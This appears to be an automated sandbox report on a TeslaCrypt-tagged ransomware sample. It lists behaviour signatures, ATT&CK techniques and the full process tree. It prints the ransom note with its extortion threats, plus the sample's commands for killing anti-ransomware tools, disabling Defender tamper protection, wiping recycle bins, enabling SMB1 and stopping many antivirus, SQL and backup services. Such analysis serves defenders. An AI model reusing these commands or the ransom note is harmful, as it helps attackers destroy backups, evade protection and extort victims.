teslacrypt | f42f289579c0ea0fb6e03342144718ac553d8f157155bd854084719291be84e8

Analysis

max time kernel
81s
max time network
73s
platform
windows7_x64
resource
win7v20201028
submitted
04/02/2021, 19:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbc[1].exe

Score

10^/10

teslacrypt discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Key Identifier: e6T+KEs17/kRgMH/kQhnlx8WNKXYY2gMkcuTkUPyeuQSo9kkn6XQNYwIhK+gn2v9L4bXpg9x5KkZfo3z6E2ZBTKJKZBCzYCZn8+HBraX1txaeHOnQU4t8XPD4X04kAtC5/h/yIAhoNSDLj2PEE0A17DLoEQ06HQyDgfRCoNyhbXvOyHRL95fDEBzIFGpvqXGwtYV9U5RTr6E/8ryes0m0Bfv7U5AuDLS9HUzRxsMts9aeXC+2e6HgOnx5ljujwUSpkO5IbHmC4avfNIPomLjwLRSbnUFfaybWRAltLswZZ0BJR63jSp8b4/Ds/mp0728Ij4OoAvqC7VzEyp/YmTwMmCJvz/aYRcwdHRjSzh0GxxK2B+MFQvDArhbTmjKEJ8Hpm2L81SlIQpyn3zSzv28W18b7o++/VDrRyjkVAK6+qMBrqO2nfXoKM7XDkNrUT5U2JHDQ1vKtGOK4GxpDY5u3zyUC6mbhsWNp77QGr77M51pE0BSoYGvS6wGRUwdTUEN8XoZr0X2s2df0pAY3ka7niAXloEwL27BS1Z52h0NuQacgsOBzctM7nq9bqJ8LFMfqUgBFgQT4pm2zpvasRAMmt08FAoAbtBVaBZKVy6pH3HbDZV8aoOF2qdbN1ZfxvEpI7NngTDG5687WOnsvDiVGJulsQmRuyNoNbO+/sn8vq8=

Emails

[email protected]

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note

Emails

[email protected]

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
ransomware teslacrypt

Executes dropped EXE 1 IoCs

pid	Process
1488	tm94ra6g.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	tm94ra6g.exe

Loads dropped DLL 1 IoCs

pid	Process
1932	bbc[1].exe

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
528	icacls.exe
2752	icacls.exe
3336	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	tm94ra6g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	tm94ra6g.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
2556	net.exe

Kills process with taskkill 48 IoCs

evasion

pid	Process
3908	taskkill.exe
4032	taskkill.exe
4060	taskkill.exe
3640	taskkill.exe
3616	taskkill.exe
3600	taskkill.exe
3820	taskkill.exe
3844	taskkill.exe
2764	taskkill.exe
3248	taskkill.exe
3296	taskkill.exe
3552	taskkill.exe
3648	taskkill.exe
3804	taskkill.exe
2236	taskkill.exe
4008	taskkill.exe
4072	taskkill.exe
2472	taskkill.exe
3524	taskkill.exe
3608	taskkill.exe
3576	taskkill.exe
3796	taskkill.exe
3892	taskkill.exe
3828	taskkill.exe
3932	taskkill.exe
2788	taskkill.exe
2004	taskkill.exe
3532	taskkill.exe
3560	taskkill.exe
3728	taskkill.exe
3788	taskkill.exe
3508	taskkill.exe
3624	taskkill.exe
3736	taskkill.exe
3592	taskkill.exe
3768	taskkill.exe
3916	taskkill.exe
3956	taskkill.exe
3968	taskkill.exe
3584	taskkill.exe
3720	taskkill.exe
3780	taskkill.exe
3836	taskkill.exe
3516	taskkill.exe
3760	taskkill.exe
3868	taskkill.exe
4024	taskkill.exe
4048	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1988	reg.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
3860	NOTEPAD.EXE
2496	notepad.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2820	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe
1488	tm94ra6g.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	1488	tm94ra6g.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	3516	taskkill.exe
Token: SeDebugPrivilege	3532	taskkill.exe
Token: SeDebugPrivilege	3508	taskkill.exe
Token: SeDebugPrivilege	3524	taskkill.exe
Token: SeDebugPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	3616	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe
Token: SeDebugPrivilege	3560	taskkill.exe
Token: SeDebugPrivilege	3600	taskkill.exe
Token: SeDebugPrivilege	3608	taskkill.exe
Token: SeDebugPrivilege	3624	taskkill.exe
Token: SeDebugPrivilege	3648	taskkill.exe
Token: SeDebugPrivilege	3640	taskkill.exe
Token: SeDebugPrivilege	3576	taskkill.exe
Token: SeDebugPrivilege	3592	taskkill.exe
Token: SeDebugPrivilege	3728	taskkill.exe
Token: SeDebugPrivilege	3780	taskkill.exe
Token: SeDebugPrivilege	3804	taskkill.exe
Token: SeDebugPrivilege	3720	taskkill.exe
Token: SeDebugPrivilege	3768	taskkill.exe
Token: SeDebugPrivilege	3760	taskkill.exe
Token: SeDebugPrivilege	3788	taskkill.exe
Token: SeDebugPrivilege	3796	taskkill.exe
Token: SeDebugPrivilege	3736	taskkill.exe
Token: SeDebugPrivilege	2788	taskkill.exe
Token: SeDebugPrivilege	3248	taskkill.exe
Token: SeDebugPrivilege	4032	taskkill.exe
Token: SeDebugPrivilege	4072	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	3296	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	3828	taskkill.exe
Token: SeDebugPrivilege	3844	taskkill.exe
Token: SeDebugPrivilege	3836	taskkill.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	3932	taskkill.exe
Token: SeDebugPrivilege	4008	taskkill.exe
Token: SeDebugPrivilege	2764	taskkill.exe
Token: SeDebugPrivilege	3908	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	4048	taskkill.exe
Token: SeDebugPrivilege	3956	taskkill.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1488	tm94ra6g.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1488	tm94ra6g.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1932 wrote to memory of 1488	1932	bbc[1].exe	26
PID 1932 wrote to memory of 1488	1932	bbc[1].exe	26
PID 1932 wrote to memory of 1488	1932	bbc[1].exe	26
PID 1932 wrote to memory of 1488	1932	bbc[1].exe	26
PID 1488 wrote to memory of 528	1488	tm94ra6g.exe	31
PID 1488 wrote to memory of 528	1488	tm94ra6g.exe	31
PID 1488 wrote to memory of 528	1488	tm94ra6g.exe	31
PID 1488 wrote to memory of 528	1488	tm94ra6g.exe	31
PID 1488 wrote to memory of 2004	1488	tm94ra6g.exe	33
PID 1488 wrote to memory of 2004	1488	tm94ra6g.exe	33
PID 1488 wrote to memory of 2004	1488	tm94ra6g.exe	33
PID 1488 wrote to memory of 2004	1488	tm94ra6g.exe	33
PID 1488 wrote to memory of 1340	1488	tm94ra6g.exe	35
PID 1488 wrote to memory of 1340	1488	tm94ra6g.exe	35
PID 1488 wrote to memory of 1340	1488	tm94ra6g.exe	35
PID 1488 wrote to memory of 1340	1488	tm94ra6g.exe	35
PID 1488 wrote to memory of 1988	1488	tm94ra6g.exe	36
PID 1488 wrote to memory of 1988	1488	tm94ra6g.exe	36
PID 1488 wrote to memory of 1988	1488	tm94ra6g.exe	36
PID 1488 wrote to memory of 1988	1488	tm94ra6g.exe	36
PID 1488 wrote to memory of 1608	1488	tm94ra6g.exe	38
PID 1488 wrote to memory of 1608	1488	tm94ra6g.exe	38
PID 1488 wrote to memory of 1608	1488	tm94ra6g.exe	38
PID 1488 wrote to memory of 1608	1488	tm94ra6g.exe	38
PID 1488 wrote to memory of 952	1488	tm94ra6g.exe	41
PID 1488 wrote to memory of 952	1488	tm94ra6g.exe	41
PID 1488 wrote to memory of 952	1488	tm94ra6g.exe	41
PID 1488 wrote to memory of 952	1488	tm94ra6g.exe	41
PID 1488 wrote to memory of 692	1488	tm94ra6g.exe	43
PID 1488 wrote to memory of 692	1488	tm94ra6g.exe	43
PID 1488 wrote to memory of 692	1488	tm94ra6g.exe	43
PID 1488 wrote to memory of 692	1488	tm94ra6g.exe	43
PID 1488 wrote to memory of 368	1488	tm94ra6g.exe	44
PID 1488 wrote to memory of 368	1488	tm94ra6g.exe	44
PID 1488 wrote to memory of 368	1488	tm94ra6g.exe	44
PID 1488 wrote to memory of 368	1488	tm94ra6g.exe	44
PID 1488 wrote to memory of 1564	1488	tm94ra6g.exe	46
PID 1488 wrote to memory of 1564	1488	tm94ra6g.exe	46
PID 1488 wrote to memory of 1564	1488	tm94ra6g.exe	46
PID 1488 wrote to memory of 1564	1488	tm94ra6g.exe	46
PID 1488 wrote to memory of 332	1488	tm94ra6g.exe	48
PID 1488 wrote to memory of 332	1488	tm94ra6g.exe	48
PID 1488 wrote to memory of 332	1488	tm94ra6g.exe	48
PID 1488 wrote to memory of 332	1488	tm94ra6g.exe	48
PID 1488 wrote to memory of 1532	1488	tm94ra6g.exe	50
PID 1488 wrote to memory of 1532	1488	tm94ra6g.exe	50
PID 1488 wrote to memory of 1532	1488	tm94ra6g.exe	50
PID 1488 wrote to memory of 1532	1488	tm94ra6g.exe	50
PID 1488 wrote to memory of 1096	1488	tm94ra6g.exe	51
PID 1488 wrote to memory of 1096	1488	tm94ra6g.exe	51
PID 1488 wrote to memory of 1096	1488	tm94ra6g.exe	51
PID 1488 wrote to memory of 1096	1488	tm94ra6g.exe	51
PID 1488 wrote to memory of 336	1488	tm94ra6g.exe	54
PID 1488 wrote to memory of 336	1488	tm94ra6g.exe	54
PID 1488 wrote to memory of 336	1488	tm94ra6g.exe	54
PID 1488 wrote to memory of 336	1488	tm94ra6g.exe	54
PID 1488 wrote to memory of 624	1488	tm94ra6g.exe	56
PID 1488 wrote to memory of 624	1488	tm94ra6g.exe	56
PID 1488 wrote to memory of 624	1488	tm94ra6g.exe	56
PID 1488 wrote to memory of 624	1488	tm94ra6g.exe	56
PID 1488 wrote to memory of 1604	1488	tm94ra6g.exe	57
PID 1488 wrote to memory of 1604	1488	tm94ra6g.exe	57
PID 1488 wrote to memory of 1604	1488	tm94ra6g.exe	57
PID 1488 wrote to memory of 1604	1488	tm94ra6g.exe	57

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	tm94ra6g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	tm94ra6g.exe

C:\Users\Admin\AppData\Local\Temp\bbc[1].exe
"C:\Users\Admin\AppData\Local\Temp\bbc[1].exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1932
- C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
  "C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Windows security modification
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:1488
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:528
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:1988
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:952
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:692
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:368
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:332
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:336
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:624
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\net.exe
    "net.exe" start Dnscache /y
    3⤵
    PID:1852
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start Dnscache /y
      4⤵
      PID:1508
- - C:\Windows\SysWOW64\net.exe
    "net.exe" start FDResPub /y
    3⤵
    PID:820
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start FDResPub /y
      4⤵
      PID:2028
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop bedbg /y
    3⤵
    PID:556
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:1064
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:1492
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:872
- - C:\Windows\SysWOW64\net.exe
    "net.exe" start SSDPSRV /y
    3⤵
    PID:564
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start SSDPSRV /y
      4⤵
      PID:1256
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SQL_2008 /y
    3⤵
    PID:1760
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:272
- - C:\Windows\SysWOW64\net.exe
    "net.exe" start upnphost /y
    3⤵
    PID:1468
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start upnphost /y
      4⤵
      PID:1600
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop EhttpSrv /y
    3⤵
    PID:1080
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:1572
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:440
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:1664
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:1124
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:2080
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:888
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:2132
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:1256
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:2196
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MMS /y
    3⤵
    PID:576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:2088
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:1036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:2124
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:2064
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:2288
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2212
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:2244
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:2324
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:2264
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SavRoam /y
      4⤵
      PID:2512
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:2308
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop DefWatch /y
      4⤵
      PID:2424
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ekrn /y
    3⤵
    PID:2340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:2472
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c net view
    3⤵
    PID:2384
  - - C:\Windows\SysWOW64\net.exe
      net view
      4⤵
      Discovers systems in the same network
      PID:2556
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:2416
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop RTVscan /y
      4⤵
      PID:2568
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mozyprobackup /y
    3⤵
    PID:2448
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:2820
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:2500
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:2856
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop EPSecurityService /y
    3⤵
    PID:2544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:2832
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2592
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:2888
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop EPUpdateService /y
    3⤵
    PID:2616
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:2996
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ntrtscan /y
    3⤵
    PID:2624
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:2896
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$TPSAMA /y
    3⤵
    PID:2644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:2940
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$TPS /y
    3⤵
    PID:2600
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:2908
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop EsgShKernel /y
    3⤵
    PID:2660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:1100
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:2792
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:2100
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop KAVFSGT /y
    3⤵
    PID:2864
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop KAVFSGT /y
      4⤵
      PID:2092
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLWriter /y
    3⤵
    PID:2784
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:776
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop KAVFS /y
    3⤵
    PID:2776
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop KAVFS /y
      4⤵
      PID:2104
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:2768
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:1572
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:2760
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:872
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop FA_Scheduler /y
    3⤵
    PID:2752
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:1536
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:2744
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:1500
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SDRSVC /y
    3⤵
    PID:2736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:2148
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ESHASRV /y
    3⤵
    PID:2724
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:2052
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2716
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:1160
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:2708
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:2924
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamBackupSvc /y
    3⤵
    PID:3056
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamBackupSvc /y
      4⤵
      PID:1532
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:332
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      PID:2140
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:1564
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:2540
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:888
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:2520
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:324
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
      4⤵
      PID:2396
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:2144
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:2536
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:1256
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:2316
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:2188
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:2364
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:2192
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:2476
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:2096
